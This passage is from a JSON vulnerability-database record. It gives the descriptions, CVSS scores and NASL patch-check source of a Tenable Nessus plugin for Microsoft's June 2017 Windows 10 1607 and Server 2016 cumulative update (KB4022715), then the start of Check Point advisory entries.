A local attacker can exploit these, via a specially crafted script, to bypass the Device Guard Code Integrity policy and inject arbitrary code into a trusted PowerShell process. (CVE-2017-0173, CVE-2017-0215, CVE-2017-0216, CVE-2017-0218, CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V instruction emulation due to a failure to properly enforce privilege levels. An attacker on a guest operating system can exploit this to gain elevated privileges on the guest. Note that the host operating system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect permissions being set on folders inside the DEFAULT folder structure. An authenticated, remote attacker can exploit this, by logging in to the affected system before the user can log in, to modify the user's DEFAULT folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. 
An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465, CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. 
(CVE-2017-8470, CVE-2017-8471, CVE-2017-8473, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the Windows Secure Kernel Mode feature due to a failure to properly handle objects in memory. A local attacker can exploit this, via a specially crafted application, to bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in Microsoft Edge due to improper handling of JavaScript XML DOM objects. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in Microsoft Edge in the Fetch API due to improper handling of filtered response types. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due to improper handling of kernel mode requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted kernel mode request, to cause the machine to stop responding or reboot. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX due to improper handling of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0173", "CVE-2017-0193", "CVE-2017-0215", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", 
"CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8498", "CVE-2017-8504", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8553", "CVE-2017-8554", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022715.NASL", "href": "https://www.tenable.com/plugins/nessus/100760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100760);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0173\",\n \"CVE-2017-0193\",\n \"CVE-2017-0215\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n 
\"CVE-2017-8494\",\n \"CVE-2017-8496\",\n \"CVE-2017-8497\",\n \"CVE-2017-8498\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98873,\n 98878,\n 98879,\n 98880,\n 98882,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98940,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022715\");\n script_xref(name:\"MSFT\", value:\"MS17-4022715\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4022715. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. 
A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0173,\n CVE-2017-0215, CVE-2017-0216, CVE-2017-0218,\n CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. 
(CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. 
(CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. 
A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\");\n # https://support.microsoft.com/en-us/help/4022715/windows-10-update-kb4022715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac6572f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022715 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-06';\nkbs = make_list('4022715');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(\n os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-10-18T18:46:34", "description": "An information disclosure vulnerability exists in Microsoft Edge and Internet Explorer. The vulnerability is due to Microsoft Edge improperly handling objects in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted html file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Browser Information Disclosure (CVE-2017-8529)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2017-06-13T00:00:00", "id": "CPAI-2017-0456", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:33:39", "description": "A use after free vulnerability exists in Microsoft Edge. The vulnerability is due to the way JavaScript engine renders when handling objects in memory. 
